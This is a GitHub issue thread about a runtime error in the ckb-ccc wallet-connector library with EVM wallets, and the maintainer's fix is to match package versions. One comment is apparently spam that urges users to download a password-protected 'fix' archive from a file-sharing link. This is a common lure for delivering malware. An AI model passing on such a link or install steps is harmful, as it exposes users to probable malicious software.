### ISSUE TITLE
Uncaught runtime errors: Cannot read properties of undefined (reading 'cellDeps')

### ISSUE THREAD

**Issue by tea2x** [ckb-ecofund/ccc#24]
Hello,

I was testing upgrading the new ccc with the following dependencies:
```
  "dependencies": {
    "@ckb-ccc/connector-react": "^0.0.12-alpha.6",
    "@ckb-ccc/core": "^0.0.11-alpha.3",
    "@ckb-ccc/lumos-patches": "^0.0.12-alpha.6",
```
and then i get a runtime error from ccc/core:
<img width="1035" alt="Screenshot 2024-08-23 at 16 33 36" src="https://github.com/user-attachments/assets/45e10a19-9472-4448-9289-3ee223248294">

**Quick observation on my test env**:
- The error happens only when connecting to: JoyID EVM, OKX EVM, MEtamask, Brave, EVM.
- It does NOT happen when connecting to: JoyID none EVM, OKX none EVM, UTXO Global, Unisat.

**Regenerate**: start the following repo https://github.com/tea2x/joydao/tree/feat/upgrade-ccc

Please check this out!

**Comment by Hanssen0** [comment]
Please upgrade the version of @ckb-ccc/core to be the same as @ckb-ccc/connector-react.

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Hanssen0** [comment]
The issue is closed due to inactivity and should be solved using the same version.
